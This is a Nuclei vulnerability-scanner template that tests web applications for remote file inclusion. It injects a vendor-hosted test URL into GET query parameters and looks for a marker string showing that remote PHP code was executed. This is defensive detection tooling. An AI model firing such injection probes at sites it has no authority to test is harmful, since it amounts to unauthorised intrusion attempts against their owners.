nuclei-templates/dast/vulnerabilities/rfi/generic-rfi.yaml

id: generic-rfi

info:
  name: Generic Remote File Inclusion
  author: m4lwhere
  severity: high
  reference:
    - https://www.invicti.com/learn/remote-file-inclusion-rfi/
  metadata:
    max-request: 1
  tags: rfi,dast,oast

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      rfi:
        - "https://rfi.nessus.org/rfi.txt"

    fuzzing:
      - part: query
        mode: single
        fuzz:
          - "{{rfi}}"

    stop-at-first-match: true
    matchers:
      - type: word
        part: body  # Confirms the PHP was executed
        words:
          - "NessusCodeExecTest"
# digest: 490a00463044022029d2873c4bd52bc2237f5807f6053de597738e331d83ff8661e78b54b9f8eabc02200aef90a617b1a1997f782d347cdea43e3cba3e453b60aa77148a0632bade8d7c:922c64590222798bb761d5b6d8e72950